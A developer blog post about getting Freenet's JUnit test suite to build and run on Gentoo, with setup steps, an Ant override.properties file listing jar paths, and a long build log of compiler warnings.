About Freenet:

Freenet is free open source software and has been under constant development in the Freenet Project since 2000. The mission of Freenet is to realize the technical aspect of censorship resistance. Its unique set of features includes a decentralized, global friend-to-friend publishing structure (the darknet mode), access-dependent content lifetime, decentralized spam resistance, stable pseudonyms, and hosting without a server.

Contact information:

Multimedia:

Additional information:

Screenshots: 2017-03-08-freenet-sites, 2017-03-08-freenet-connections-0-4-4, 2017-03-08-freenet-sharesite-0-4-4_1, 2017-03-08-freenet-sharesite-0-4-4_2, 2017-03-08-freenet-sharesite-0-4-4_3

I finally got the Freenet junit testsuite to run on Gentoo

Blindfolded Dog

For years I developed Freenet partially blindfolded, because I could not get the tests to actually run on my Gentoo box.

As of today, that’s finally over: The testsuite runs successfully. My setup is still unclean, but it finally works. No more asking other contributors to run the tests for me.

To reproduce:

  1. Install Freenet and its dependencies via Gentoo: emerge freenet
  2. Install bouncycastle 1.54: emerge =dev-java/bcprov-1.54
  3. Symlink all ant-stuff into ~/.ant/lib: mkdir -p ~/.ant/lib; cd ~/.ant/lib; for i in $(find /usr/share/ant*/lib/ -name '*jar' | xargs); do ln -s $i; done
  4. Get the fred repository (freenet reference daemon) from https://github.com/freenet/fred
  5. Put a file named override.properties with the following content into the fred folder:
lib.contrib.get = true
lib.dir = /usr/share
lib.jars = bcprov-1.54/lib/bcprov.jar
bc.jar = lib/bcprov.jar
libtest.dir = /usr/share
# to really ensure that ant finds junit: mkdir -p ~/.ant/lib; cd ~/.ant/lib; for i in $(find /usr/share/ant*/lib/ -name '*jar' | xargs); do ln -s $i; done
# all the ant-* libs are found via cd /usr/share; find ant*/lib/ -name '*jar' | xargs
libtest.jars = freenet/lib/ant.jar hamcrest-core-1.3/lib/hamcrest-core.jar junit/lib/junit.jar junit-4/lib/junit.jar ant-antlr/lib/ant-antlr.jar ant-apache-bcel/lib/ant-apache-bcel.jar ant-apache-bsf/lib/ant-apache-bsf.jar ant-apache-log4j/lib/ant-apache-log4j.jar ant-apache-oro/lib/ant-apache-oro.jar ant-apache-regexp/lib/ant-apache-regexp.jar ant-apache-resolver/lib/ant-apache-resolver.jar ant-apache-xalan2/lib/ant-apache-xalan2.jar ant-commons-logging/lib/ant-commons-logging.jar ant-commons-net/lib/ant-commons-net.jar ant-contrib/lib/ant-contrib.jar ant-core/lib/ant-bootstrap.jar ant-core/lib/ant.jar ant-core/lib/ant-launcher.jar ant-eclipse-ecj-4.4/lib/ant-eclipse-ecj.jar ant-javamail/lib/ant-javamail.jar ant-jdepend/lib/ant-jdepend.jar ant-jsch/lib/ant-jsch.jar ant-junit/lib/ant-junit.jar ant/lib/ant-junit.jar ant/lib/ant-jsch.jar ant/lib/ant-apache-resolver.jar ant/lib/ant-commons-net.jar ant/lib/ant-javamail.jar ant/lib/ant-bootstrap.jar ant/lib/ant-swing.jar ant/lib/ant-apache-regexp.jar ant/lib/ant.jar ant/lib/ant-launcher.jar ant/lib/ant-jdepend.jar ant/lib/ant-apache-bcel.jar ant/lib/ant-nodeps.jar ant/lib/ant-trax.jar ant/lib/ant-apache-bsf.jar ant/lib/ant-apache-xalan2.jar ant/lib/ant-antlr.jar ant/lib/ant-commons-logging.jar ant/lib/ant-apache-log4j.jar ant/lib/ant-apache-oro.jar antlr-3/lib/antlr-tool.jar antlr-3/lib/antlr-runtime.jar antlr/lib/antlr.jar ant-nodeps/lib/ant-nodeps.jar ant-swing/lib/ant-swing.jar ant-trax/lib/ant-trax.jar

(Putting all these jars into libtest.jars is certainly overkill. Maybe I’ll trim this down at some point. But right now I’m happy that this finally works, so I’m going to celebrate it a bit and defer the cleanup for later ☺)

Happy Hacking!

PS: And here’s a complete build log:

ant clean >/dev/null; ant
Buildfile: /home/arne/fred-work/build.xml

init:
    [mkdir] Created dir: /home/arne/fred-work/build/main
    [mkdir] Created dir: /home/arne/fred-work/dist
    [mkdir] Created dir: /home/arne/fred-work/build/test
    [mkdir] Created dir: /home/arne/fred-work/run

env:

ensure-ext:

libdep-bc:

ensure-bc:

env-gjs:

ensure-gjs:

dep:

check-version-file:

build-version-file:
     [copy] Copying 1 file to /home/arne/fred-work/build/main/freenet/node
     [echo] Updated build version to @unknown@ in build/main/freenet/node/Version.java

build:
    [javac] Compiling 1080 source files to /home/arne/fred-work/build/main
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetWorkerThread.java:29: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ContainerInserter.java:37: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/InsertCompressor.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/SingleFileFetcher.java:51: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/SingleFileStreamGenerator.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/CSSTokenizerFilter.java:23: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/CSSReadFilter.java:23: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/PNGFilter.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/AddPeer.java:29: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/FCPPluginClientMessage.java:13: warning: [deprecation] PluginTalker in freenet.pluginmanager has been deprecated
    [javac] import freenet.pluginmanager.PluginTalker;
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/FilterMessage.java:22: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/QueueToadlet.java:89: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/ConnectionsToadlet.java:51: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/HTTPRequestImpl.java:39: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/WelcomeToadlet.java:38: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/config/WrapperConfig.java:18: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/JceLoader.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/SHA256.java:50: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/SSL.java:44: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/Yarrow.java:31: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/l10n/ISO639_3.java:13: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/node/simulator/LongTermMHKTest.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/node/simulator/LongTermManySingleBlocksTest.java:39: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/pluginmanager/PluginDownLoaderOfficialHTTPS.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/Bzip2Compressor.java:19: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/DecompressorThreadManager.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/GzipCompressor.java:14: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/NewLZMACompressor.java:20: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/OldLZMACompressor.java:19: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/plugins/helpers1/AbstractFCPHandler.java:10: warning: [deprecation] PluginReplySender in freenet.pluginmanager has been deprecated
    [javac] import freenet.pluginmanager.PluginReplySender;
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/tools/CleanupTranslations.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveContext.java:18: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * WARNING: Changing non-transient members on classes that are Serializable can result in 
    [javac]                                                                           ^
    [javac] /home/arne/fred-work/src/freenet/support/Logger.java:88: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(br);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/Logger.java:101: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(is);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/client/FailureCodeTracker.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * WARNING: Changing non-transient members on classes that are Serializable can result in 
    [javac]                                           ^
    [javac] /home/arne/fred-work/src/freenet/client/async/TooManyFilesInsertException.java:5: warning: [serial] serializable class TooManyFilesInsertException has no definition of serialVersionUID
    [javac] public class TooManyFilesInsertException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:962: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(br);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:963: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(isr);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:964: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(bis);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/io/StorageFormatException.java:6: warning: [serial] serializable class StorageFormatException has no definition of serialVersionUID
    [javac] public class StorageFormatException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.TempBucketFactory;
    [javac]                    ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.TempBucketFactory;
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:48: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private transient ClientRequestScheduler sskFetchSchedulerRT;
    [javac]                                                   ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:218: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             }, NativeThread.NORM_PRIORITY);
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:245: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             }, NativeThread.NORM_PRIORITY);
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/support/io/ResumeFailedException.java:3: warning: [serial] serializable class ResumeFailedException has no definition of serialVersionUID
    [javac] public class ResumeFailedException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:55: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private final RequestStarter starter;
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:49: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private final OfferedKeysList offeredKeys;
    [javac]                ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:157: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 getter.internalError(e, this, clientContext, persistent);
    [javac]                  ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:34: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private long lastUpdated;
    [javac]                    ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:84: warning: [deprecation] queue(FCPMessage) in FCPConnectionOutputHandler has been deprecated
    [javac]                     subscriber.outputHandler.queue(alert.getFCPMessage());
    [javac]                                             ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:382: warning: [deprecation] queue(FCPMessage) in FCPConnectionOutputHandler has been deprecated
    [javac]                         subscriber.outputHandler.queue(alert.getFCPMessage());
    [javac]                                                 ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:337: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                             Closer.close(is);
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:364: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(is);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:449: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(tarIS);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:149: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                             Closer.close(is);
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:354: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(currentIS);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:419: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(currentIS);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:452: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 Closer.close(os);
    [javac]                 ^
    [javac] /home/arne/fred-work/src/freenet/client/async/USKManager.java:65: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     /** Latest SSK slot known to be by the author by blanked-edition-number USK */
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/USKManager.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * Tracks the latest version of every known USK.
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/RealCompressor.java:115: warning: [deprecation] MIN_PRIORITY in NativeThread has been deprecated
    [javac]             return new NativeThread(r, "Compressor thread", NativeThread.MIN_PRIORITY, true);
    [javac]                                                                         ^
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:81: warning: [rawtypes] found raw type: ArrayDeque
    [javac]         queue = new ArrayDeque[priorities];
    [javac]                     ^
    [javac]   missing type arguments for generic class ArrayDeque<E>
    [javac]   where E is a type-variable:
    [javac]     E extends Object declared in class ArrayDeque
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:211: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                 }, NativeThread.NORM_PRIORITY);
    [javac]                                ^
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:230: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         return NativeThread.NORM_PRIORITY;
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/support/MemoryLimitedJobRunner.java:35: warning: [rawtypes] found raw type: ArrayDeque
    [javac]         this.jobs = new ArrayDeque[priorities];
    [javac]                         ^
    [javac]   missing type arguments for generic class ArrayDeque<E>
    [javac]   where E is a type-variable:
    [javac]     E extends Object declared in class ArrayDeque
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/ClientRequest.java:390: warning: [deprecation] HIGH_PRIORITY in NativeThread has been deprecated
    [javac]         }, NativeThread.HIGH_PRIORITY);
    [javac]                        ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/ClientRequest.java:396: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                     return NativeThread.NORM_PRIORITY;
    [javac]                                        ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1237: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1238: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(cos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1699: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/InsertContext.java:300: warning: [dep-ann] deprecated item is not annotated with @Deprecated
    [javac]     public void onResume() {
    [javac]                 ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:32: warning: [deprecation] HIGH_PRIORITY in NativeThread has been deprecated
    [javac]     static final int WRITE_AT_PRIORITY = NativeThread.HIGH_PRIORITY-1;
    [javac]                                                      ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:103: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             queueInternal(job, NativeThread.NORM_PRIORITY);
    [javac]                                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:113: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             queue(job, NativeThread.NORM_PRIORITY);
    [javac]                                    ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistenceDisabledException.java:3: warning: [serial] serializable class PersistenceDisabledException has no definition of serialVersionUID
    [javac] public class PersistenceDisabledException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:395: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dataInput);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:396: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dataOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:397: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(output);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:35: warning: [unchecked] unchecked cast
    [javac]         grabClients = (T[]) new Object[0];
    [javac]                             ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:36: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]         grabArrays = new RemoveRandomWithObject[0];
    [javac]                          ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:36: warning: [unchecked] unchecked conversion
    [javac]         grabArrays = new RemoveRandomWithObject[0];
    [javac]                      ^
    [javac]   required: RemoveRandomWithObject<T>[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:69: warning: [unchecked] unchecked cast
    [javac]         else return (C) grabArrays[idx];
    [javac]                                   ^
    [javac]   required: C
    [javac]   found:    RemoveRandomWithObject<T>
    [javac]   where T,C are type-variables:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:233: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:233: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:234: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[0];
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:238: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:238: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:239: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[1-x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:270: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:270: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:271: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[1-x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:291: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:291: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:292: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[0];
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:295: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[x] }; // don't use RGA, it may be nulled out
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:295: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[x] }; // don't use RGA, it may be nulled out
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:296: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:324: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]             grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:324: warning: [unchecked] unchecked cast
    [javac]             grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] Note: Some input files additionally use or override a deprecated API.
    [javac] Note: Some input files additionally use unchecked or unsafe operations.
    [javac] 100 warnings
     [copy] Copying 393 files to /home/arne/fred-work/build/main/freenet/clients/http/staticfiles
     [copy] Copying 19 files to /home/arne/fred-work/build/main/freenet/l10n
     [copy] Copying 1 file to /home/arne/fred-work/build/main

unit-build:

env:

libdep-junit:

env:

libdep-hamcrest:
    [javac] Compiling 135 source files to /home/arne/fred-work/build/test
    [javac] warning: [path] bad path element "/usr/share/ant-core/lib/xalan.jar": no such file or directory
    [javac] warning: [path] bad path element "/usr/share/junit-4/lib/../../hamcrest-core/lib/hamcrest-core.jar": no such file or directory
    [javac] /home/arne/fred-work/test/freenet/client/CodeTest.java:3: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
    [javac] /home/arne/fred-work/test/freenet/client/OnionFECCodecTest.java:8: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
    [javac] /home/arne/fred-work/test/freenet/crypt/ciphers/RijndaelTest.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:3: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
